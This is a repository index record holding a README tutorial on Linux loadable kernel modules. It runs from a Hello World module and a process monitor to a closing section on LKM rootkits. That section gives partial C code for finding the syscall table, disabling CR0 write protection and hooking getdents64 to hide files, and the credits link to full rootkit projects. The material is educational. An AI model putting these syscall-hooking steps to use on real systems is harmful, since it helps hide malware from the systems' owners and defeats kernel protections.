{"id":27363513,"url":"https://github.com/thebigcicca/linuxlowleveladdict","last_synced_at":"2025-04-13T04:01:55.943Z","repository":{"id":48875058,"uuid":"381524545","full_name":"thebigcicca/LinuxLowlevelAddict","owner":"thebigcicca","description":"A small introduction to lkm.","archived":false,"fork":false,"pushed_at":"2024-11-19T23:15:33.000Z","size":310,"stargazers_count":6,"open_issues_count":0,"forks_count":1,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-10T11:16:16.553Z","etag":null,"topics":["linux-driver-programming","linux-drivers","linux-kernel-module","linux-lowlevel","lkm","lkm-hacking","lkm-rootkit","low-level","low-level-programming"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/thebigcicca.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-06-29T23:47:39.000Z","updated_at":"2025-03-12T07:03:16.000Z","dependencies_parsed_at":"2025-02-04T21:41:41.569Z","dependency_job_id":"041e2e44-b9da-47bf-9fda-781489cdd974","html_url":"https://github.com/thebigcicca/LinuxLowlevelAddict","commit_stats":null,"previous_names":["brunociccarino/linux-lowlevel","bgcicca/linuxlowleveladdict","thebigcicca/linuxlowleveladdict"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/thebigcicca%2FLinuxLowlevelAddict","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/thebigcicca%2FLinuxLowlevelAddict/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/thebigcicca%2FLinuxLowlevelAddict/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/thebigcicca%2FLinuxLowlevelAddict/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/thebigcicca","download_url":"https://codeload.github.com/thebigcicca/LinuxLowlevelAddict/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248661701,"owners_count":21141450,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["linux-driver-programming","linux-drivers","linux-kernel-module","linux-lowlevel","lkm","lkm-hacking","lkm-rootkit","low-level","low-level-programming"],"created_at":"2025-04-13T04:01:25.755Z","updated_at":"2025-04-13T04:01:55.634Z","avatar_url":"https://github.com/thebigcicca.png","language":"C","readme":"\u003cimg src=\"img/tux.jpg\"\u003e\n© 2021 BrunoCiccarino \n\n\u003ca href=\"https://github.com/Ch4r0nN/LKM-Exploration/blob/main/LICENSE\"\u003eLICENSE\u003c/a\u003e\n\nHey folks! Today, I’m going to walk you through LKMs (Loadable Kernel Modules)—from a simple \"Hello World\" module all the way to creating an LKM rootkit. If you find this helpful, feel free to share it, and thanks in advance to everyone who reads till the end. You'll find all the code and references linked at the bottom of the post, so be sure to check out the sources. Trust me, digging into those and modifying the code will really help you learn more. Heads-up though—some of the code is under the GPL 3 license, so make sure you’re aware of the terms.\n\nWhat You’ll Need:\n\n`linux-headers-generic`\n`A C compiler (I recommend GCC or cc)`\n\nTable of Contents:\n\n* 1) What is LKM and how it works\n* 2) Example LKM Makefile\n* 3) How modules get loaded into the kernel\n* 4) LKM \"Hello World\"\n* 5) Key changes over the years\n* 6) Syscall table changes in Kernel 5.7\n* 7) LKM for process monitoring\n* 8) Building an LKM rootkit\n\n### 1) What is LKM and how it works:\nLKMs are Loadable Kernel Modules that help the Linux kernel extend its functionality—like adding drivers for hardware without needing to recompile the entire kernel. They’re perfect for device drivers (like sound cards), file systems, etc. Every LKM at the very least needs these two basic functions:\n\n```c\nstatic int __init module_init(void)\n{\n    return 0;\n}\n\nstatic void __exit module_exit(void)\n{\n}\n```\n\n### 2) Example LKM Makefile:\nHere’s a super simple Makefile for compiling your module:\n\n```Makefile\nobj-m := example.o\nKDIR := /lib/modules/$(shell uname -r)/build\nPWD := $(shell pwd)\n\nall:\n $(MAKE) -C $(KDIR) M=$(PWD) modules\n\nclean:\n $(MAKE) -C $(KDIR) M=$(PWD) clean\n```\n\n### 3) How Modules Get Loaded into the Kernel:\nYou can see the modules loaded into the kernel with the lsmod command. It checks the info in /proc/modules. Modules usually identify the kernel through aliases like this:\n\n`alias char-major-10–30 softdog`\n\nThis tells modprobe that the `softdog.o` module should be loaded, and it checks `/lib/modules/version/modules.dep` for dependencies created by running `depmod -a`.\n\n### 4) LKM \"Hello World\":\nHere’s how to make a super basic \"Hello World\" module:\n\n```c\n#include \u003clinux/module.h\u003e \n#include \u003clinux/kernel.h\u003e \n#include \u003clinux/init.h\u003e   \n\nstatic int __init hello_init(void)\n{\n    printk(KERN_INFO \"\u003c1\u003eHello World\\n\");\n    return 0;\n}\n\nstatic void __exit hello_exit(void)\n{\n    printk(KERN_INFO\"\u003c1\u003e Bye bye!\");\n}\n\nmodule_init(hello_init);\nmodule_exit(hello_exit);\n\nMODULE_AUTHOR(\"BrunoCiccarino\");\nMODULE_LICENSE(\"GPL\");\n```\n\n### 5) Key Changes in LKM over the Years:\nThere have been some pretty significant changes in LKMs over time, so let’s break them down by Linux kernel version:\n\nKernel 2.x (up to 2.6):\n\nInitial support for dynamic LKM loading and unloading.\nBetter debugging tools (OOPS, PANIC).\nKernel 2.6.x:\n\nIntroduction of udev for better device management.\nPreemptive kernel for quicker response times.\nNative Posix Thread Library (NPTL) improves handling of multithreaded processes.\nKernel 3.x:\n\nSupport for namespaces, improving container tech like Docker.\nFilesystem and GPU driver improvements.\nKernel 4.x:\n\nKernel security gets a boost with KASLR.\nBetter container support (Cgroups, namespaces).\nNew hardware support.\nKernel 5.x:\n\nBetter filesystem encryption and live patching.\nExpansion of BPF beyond just networks.\nBetter RISC-V and ARM support.\nKernel 5.7:\n\nMajor change: the syscall table (sys_call_table) became less accessible for security reasons. Modules that needed to modify the syscall table had to adapt.\nKernel 6.x:\n\nRust language support for safer kernel module development.\nSecurity and isolation improvements, with a focus on energy efficiency for mobile devices.\n\n### 6) Changes in the Syscall Table in Kernel 5.7:\nIn Linux 5.7, changes were made to protect the syscall table. It’s now write-protected and not easily accessible, which is a big win for security but complicated things for legitimate modules that rely on it. If you were using kprobes.h to find the sys_call_table, you’d need a new strategy. Now, you can’t modify it directly due to protections like Write-Protection (WP).\n\n### 7) LKM for Process Monitoring:\nThis is a module that monitors processes in the kernel by periodically running checks (e.g., every 2 seconds) using a timer. It watches for things like process creation and termination, file access, and network usage.\n\nHere’s a bit of code to get you started with that:\n\n```c\n#include \u003clinux/module.h\u003e\n#include \u003clinux/sched.h\u003e\n#include \u003clinux/timer.h\u003e\n#include \u003clinux/cred.h\u003e\n\nstatic struct timer_list procmonitor_timer;\n\nstatic void procmonitor_check_proc_tree(unsigned long unused)\n{\n    struct task_struct *task;\n    for_each_process(task)\n        printk(KERN_INFO \"process: %s, PID: %d\\n\", task-\u003ecomm, task-\u003epid);\n\n    mod_timer(\u0026procmonitor_timer, jiffies + msecs_to_jiffies(2000));\n}\n\nstatic int __init procmonitor_init(void)\n{\n    setup_timer(\u0026procmonitor_timer, procmonitor_check_proc_tree, 0);\n    mod_timer(\u0026procmonitor_timer, jiffies + msecs_to_jiffies(200));\n    return 0;\n}\n\nstatic void __exit procmonitor_exit(void)\n{\n    del_timer_sync(\u0026procmonitor_timer);\n}\n\nmodule_init(procmonitor_init);\nmodule_exit(procmonitor_exit);\n```\n\n### 8) LKM Rootkits:\nRootkits are basically malicious modules that hijack system calls to hide malware. Here’s how they hook into the syscall table and modify behavior.\n\nFirst, you need to locate the syscall table:\n\n```c\nunsigned long *find_syscall_table(void)\n{\n    typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);\n    kallsyms_lookup_name_t kallsyms_lookup_name;\n    register_kprobe(\u0026kp);\n    kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;\n    unregister_kprobe(\u0026kp);\n    return (unsigned long*)kallsyms_lookup_name(\"sys_call_table\");\n}\n```\n\nThen, you can unprotect the memory where the syscall table is:\n\n```c\nstatic inline void unprotect_memory(void)\n{\n    write_cr0_forced(cr0 \u0026 ~0x00010000);\n}\n```\n\nAfter that, replace the original function with your hook:\n\n```c\nstatic int __init ghost_init(void)\n{\n    __syscall_table = find_syscall_table();\n    if (!__syscall_table) return -1;\n\n    cr0 = read_cr0();\n    orig_getdents64 = (void *)__syscall_table[MY_NR_getdents];\n    unprotect_memory();\n    __syscall_table[MY_NR_getdents] = (unsigned long)hook_getdents64;\n    protect_memory();\n    return 0;\n}\n```\n\nThe hook function intercepts and hides files:\n\n```c\nasmlinkage int hook_getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count) {\n    int ret = orig_getdents64(fd, dirp, count);\n    // Intercept the syscall here...\n    return ret;\n}\n```\n\n![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/v5l3gkesr11o1czfupbq.png)\n\n### Credits\n[The Hackers Choice](http://www.ouah.org/LKM_HACKING.html)\n[elinux](https://elinux.org/Deferred_Initcalls)\n[kernel br](https://github.com/kernelbr)\n[xcellerator](https://xcellerator.github.io/posts/linux_rootkits_11)\n[lkmpg](https://sysprog21.github.io/lkmpg/)\n[cat enjoyer](https://telegra.ph/Hooking-linux-kernel-FIFOs-05-21)\n[My rootkit](https://github.com/BrunoCiccarino/HiddenGhost)\n[diamorphine](https://github.com/m0nad/Diamorphine)\n","funding_links":[],"categories":[],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthebigcicca%2Flinuxlowleveladdict","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fthebigcicca%2Flinuxlowleveladdict","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fthebigcicca%2Flinuxlowleveladdict/lists"}